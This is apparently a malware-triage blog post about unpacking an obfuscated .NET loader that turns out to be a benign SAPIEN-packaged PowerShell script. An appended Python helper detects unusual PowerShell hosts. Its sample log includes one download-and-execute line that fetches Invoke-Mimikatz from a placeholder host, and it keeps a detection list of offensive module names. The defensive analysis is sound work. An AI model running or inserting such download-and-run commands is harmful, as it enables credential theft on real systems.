Sapien powershell studio 2017

Several weeks ago, during one of the investigations, I needed to triage a few potentially malicious Windows executables. One of them was a .NET binary located in a seemingly legitimate subdirectory under Program Files. At the same time, the file was obfuscated (based on a quick look at FLOSS output) and, according to VirusTotal, it was detected as "potentially malicious" by several antivirus products. Well, I thought, even if the file turns out to be non-malicious, there must be a reason for it to be obfuscated. Oh boy, how little did I know…

(Re)discovery

I opened the file in dnSpy and immediately encountered the first obstacle: the code was obfuscated with SmartAssembly. Fortunately, de4dot did all the dirty work for me, and within seconds I was left with compact code consisting of several classes. I quickly located the main part of the program and realized that I was likely dealing with some kind of loader: part of the code was responsible for reading, decrypting and parsing data from two RT_RCDATA resources.

After poking around a little bit more, I found a method that was responsible for creating a new PowerShell runspace and executing PowerShell code retrieved from a previously decrypted resource. I was aware of tools like p0wnedShell making use of exactly the same method to "execute PowerShell code without running powershell.exe", so I thought that I was finally onto something.

At this stage, I just wanted to get my hands on the decrypted PowerShell code as fast as possible. Using CFF Explorer, I exported the RT_RCDATA resource content to a file. Then I copied the C# code responsible for decryption from the dnSpy window and pasted it into LINQPad. I also needed to make a few small adjustments to the original code to read the content of the resource from a file and pass it to the decryption function. The code worked well, but what I got back was not exactly what I expected. It was still PowerShell code, but it did not look like Invoke-Mimikatz or any other offensive module that I knew of. Instead, I was looking at a rather ordinary script written by someone to manage software and patch installation on workstations.

What a disappointment! All that effort for nothing? One last thing I wanted to figure out was the reason why someone made an effort to package a simple PowerShell script in this way. Was it a custom-made packer? Or maybe the file was generated by some tool that I was not aware of? I took a bunch of unique strings from the analyzed binary and fired up my favorite search engine. I quickly realized that the analyzed binary was likely generated using SAPIEN Script Packager, available in products like PowerShell Studio or PrimalScript.
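The loader described above starts a PowerShell runspace from inside a packed .NET executable, which is the same "PowerShell without powershell.exe" technique the post attributes to p0wnedShell. From a defender's side, the useful observation is that the PowerShell engine still logs its start (event 400 carries the HostApplication command line) and, with script block logging on, the code it runs (event 4104). The following is an added example, not code from the post or from any of the tools it mentions: a small Python triage helper that flags engine starts hosted by an unexpected binary and script blocks that reference the offensive module names the post names. The log lines are constructed in a simplified key=value form (real events are EVTX records), and the list of expected hosts is an assumption a team would tune to its own environment.

```python
"""Flag PowerShell engine starts from unexpected host binaries and script
blocks that mention known offensive modules.

Added example for illustration; not code from the original post.
"""
import re

# Assumption: the hosts that are allowed to start the PowerShell engine.
# Anything else (for example a packed .NET loader under Program Files)
# deserves a closer look. Lowercase so the comparison is case-insensitive.
EXPECTED_HOSTS = {
    r"c:\windows\system32\windowspowershell\v1.0\powershell.exe",
    r"c:\windows\syswow64\windowspowershell\v1.0\powershell.exe",
    r"c:\windows\system32\windowspowershell\v1.0\powershell_ise.exe",
}

# Module names the post mentions as the kind of thing a packed loader might carry.
OFFENSIVE_MARKERS = ("Invoke-Mimikatz", "p0wnedShell")

# Constructed sample log in a simplified key=value form. Real PowerShell
# event 400 records include HostApplication; event 4104 records include
# ScriptBlockText.
SAMPLE_LOG = r"""
EventID=400 HostName=ConsoleHost HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile
EventID=400 HostName=Default Host HostApplication=C:\Program Files\Vendor Tool\Updater.exe
EventID=4104 ScriptBlockText=Get-Service -Name wuauserv
EventID=4104 ScriptBlockText=IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/Invoke-Mimikatz.ps1')
"""

LINE_RE = re.compile(r"EventID=(\d+)\s+(.*)$")
HOST_RE = re.compile(r"HostApplication=(.*)$")
SB_RE = re.compile(r"ScriptBlockText=(.*)$")


def parse_line(line):
    """Return (event_id, payload) for one constructed log line, or None."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return int(m.group(1)), m.group(2)


def is_expected_host(command_line):
    """True if the HostApplication command line starts with an allowed host path."""
    cl = command_line.strip().lower()
    return any(cl.startswith(host) for host in EXPECTED_HOSTS)


def analyze(log_text):
    """Return a list of (event_id, reason, detail) findings over the log text."""
    findings = []
    for raw in log_text.splitlines():
        parsed = parse_line(raw)
        if parsed is None:
            continue
        event_id, payload = parsed
        if event_id == 400:
            m = HOST_RE.search(payload)
            if m and not is_expected_host(m.group(1)):
                findings.append((400, "unexpected PowerShell host", m.group(1).strip()))
        elif event_id == 4104:
            m = SB_RE.search(payload)
            if m:
                text = m.group(1).lower()
                hits = [k for k in OFFENSIVE_MARKERS if k.lower() in text]
                if hits:
                    findings.append((4104, "offensive module reference", ", ".join(hits)))
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(finding)
```

Run against the constructed sample, the helper reports the engine start from `Updater.exe` (the loader-style host the post is about) and the script block referencing Invoke-Mimikatz, while the ordinary `powershell.exe` start and the `Get-Service` block pass. The host check deliberately compares the start of the full command line rather than splitting it on spaces, since HostApplication contains the executable path with its arguments and the path itself may contain spaces.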














